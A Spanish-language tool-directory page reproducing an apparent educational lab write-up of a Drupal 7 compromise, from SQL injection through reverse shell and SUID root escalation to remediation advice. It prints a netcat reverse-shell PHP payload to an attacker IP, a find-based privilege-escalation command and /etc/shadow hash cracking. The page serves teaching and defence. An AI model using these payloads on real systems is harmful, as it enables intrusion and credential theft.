Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Audit-BlackBox-Web-to-Root — Auditoría de seguridad Black Box de un servidor Drupal 7. Demostración de una Kill Chain completa: Inyección SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalada a Root (SUID). Este repositorio contiene el informe técnico detallado, las pruebas de explotación (PoC) y las medidas de remediación para asegurar la infraestructura. | Kitploit
Herramientas/GitHubGitHub/fbm31/audit-blackbox-web-to-root
Descifrado de ContraseñasEscalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Aprendizaje y Educación
Labs y Práctica
GitHubfbm31/audit-blackbox-web-to-root

Audit-BlackBox-Web-to-Root

Ver Repositorio
hace 7 mesesAún no revisado

Acerca de

Auditoría de seguridad Black Box de un servidor Drupal 7. Demostración de una Kill Chain completa: Inyección SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalada a Root (SUID). Este repositorio contiene el informe técnico detallado, las pruebas de explotación (PoC) y las medidas de remediación para asegurar la infraestructura.

Compartir

Pentest Lab : Cadena de explotación web y sistema (Drupal to Root)

Disclaimer

Este proyecto se realizó en un entorno de laboratorio controlado y aislado con fines educativos y académicos. No se ha atacado ninguna infraestructura real. El objetivo es aprender a asegurar los sistemas comprendiendo los mecanismos de ataque.


Entorno de trabajo y objetivos

El Escenario

El objetivo de este proyecto es realizar una auditoría en caja negra (Black Box). Esto significa que el análisis comienza sin ningún conocimiento previo del objetivo: no se proporcionó ningún identificador, documentación técnica ni código fuente.

La Arquitectura del Lab

La infraestructura se desplegó virtualmente bajo VMware en una red privada aislada (Host-Only) para evitar cualquier interacción con el exterior.

  • Máquina Atacante (Kali Linux): 192.168.78.131
    • Herramientas: Nmap, Python, Netcat, John the Ripper.
  • Máquina Objetivo (Víctima): 192.168.78.132
    • SO: Linux (Debian).
    • Estado inicial: Desconocido.

Fase 1: Reconocimiento y localización

El primer paso consistió en cartografiar la superficie de ataque de la máquina objetivo mediante un escaneo de puertos.

Comando ejecutado: nmap -sV 192.168.78.132

Nmap Scan

Servicios identificados:

  • Puerto 22 (TCP): SSH (OpenSSH 6.0p1).
  • Puerto 80 (TCP): Servidor HTTP (Apache 2.2.22).
  • Puerto 111 (TCP): rpcbind.

El análisis del servicio Web (Puerto 80) y del archivo robots.txt reveló la presencia de un CMS Drupal. La inspección del código fuente permitió identificar una versión obsoleta: Drupal 7.x.


Análisis de vulnerabilidades

Los resultados de la fase de reconocimiento pusieron de manifiesto una superficie de ataque crítica: un CMS Drupal 7 sin mantenimiento. Esta versión es históricamente conocida por ser vulnerable a fallos de seguridad importantes (especialmente "Drupalgeddon").

Ante esta situación, la auditoría se orientó hacia una búsqueda específica de vulnerabilidades públicas (CVE). Esta enumeración confirmó la existencia de una cadena de explotación completa, que permite pasar de un simple visitante web a un administrador del sistema "Root".

Vectores de ataque identificados:

  1. Web: Inyección SQL (CVE-2014-3704).
  2. Aplicativo: Mala configuración del módulo "PHP Filter".
  3. Sistema: Permisos SUID peligrosos en binarios del sistema.

Explotación (Kill Chain)

Paso 1: Intrusión inicial (Inyección SQL)

Explotación de la vulnerabilidad CVE-2014-3704 (Drupalgeddon). Esta vulnerabilidad en la API de base de datos de Drupal permite inyectar comandos SQL sin autenticación.

  • Acción: Inyección de un nuevo usuario en la tabla users con derechos de Administrador.
  • Resultado: Acceso al panel de administración del CMS.

Exploit SQLi

Obtener el script Python

Paso 2: Ejecución de código (RCE & Reverse Shell)

Una vez conectado como administrador, uso del módulo nativo PHP Filter. Este módulo, mal configurado, permite ejecutar código PHP arbitrario en las páginas del sitio.

  • Payload: <?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>
  • Resultado: Obtención de un shell remoto en la máquina Kali (usuario www-data).

Reverse Shell

Paso 3: Escalada de privilegios (Hacia Root)

Análisis de los archivos con permiso SUID (Set User ID). Descubrimiento de una configuración crítica en el comando find.

  • Comando de escalada: find . -exec '/bin/sh' \;
  • Resultado: El binario find se ejecuta como root, lanzando un shell con privilegios Root (uid=0).

Paso 4: Post-explotación

Una vez obtenido el acceso root, lectura del archivo sensible /etc/shadow para extraer las huellas (hashes) de las contraseñas de usuarios.

  • Acción: Uso de John the Ripper para romper los hashes SHA-512 mediante ataque de diccionario.
  • Resultado: Recuperación de la contraseña root/usuario (baja complejidad), permitiendo la persistencia en el sistema.

Reverse Shell

Síntesis

La auditoría reveló un nivel de riesgo CRÍTICO. La combinación de un CMS obsoleto y una negligencia en la configuración del sistema (SUID) permite la compromisión total del servidor.

Impactos para la empresa:

  • Confidencialidad: Posible exfiltración de la base de datos de clientes y archivos del sistema (/etc/shadow).
  • Integridad: Modificación o eliminación total de los datos del sitio.
  • Disponibilidad: Riesgo de sabotaje o interrupción del servicio.

Plan de acción prioritario:

  1. Actualización: Migrar Drupal a la última versión estable para corregir la vulnerabilidad SQLi.
  2. Endurecimiento del Sistema: Eliminar el bit SUID de los ejecutables no esenciales (chmod u-s /usr/bin/find).
  3. Mínimo Privilegio: Desactivar el módulo PHP Filter si no es estrictamente necesario.

Documentación

Para el detalle técnico completo, los scripts utilizados y el análisis en profundidad, consulte el informe completo: Leer el Informe de Auditoría (PDF)

Autor

Fabien MOINE

Descargar herramienta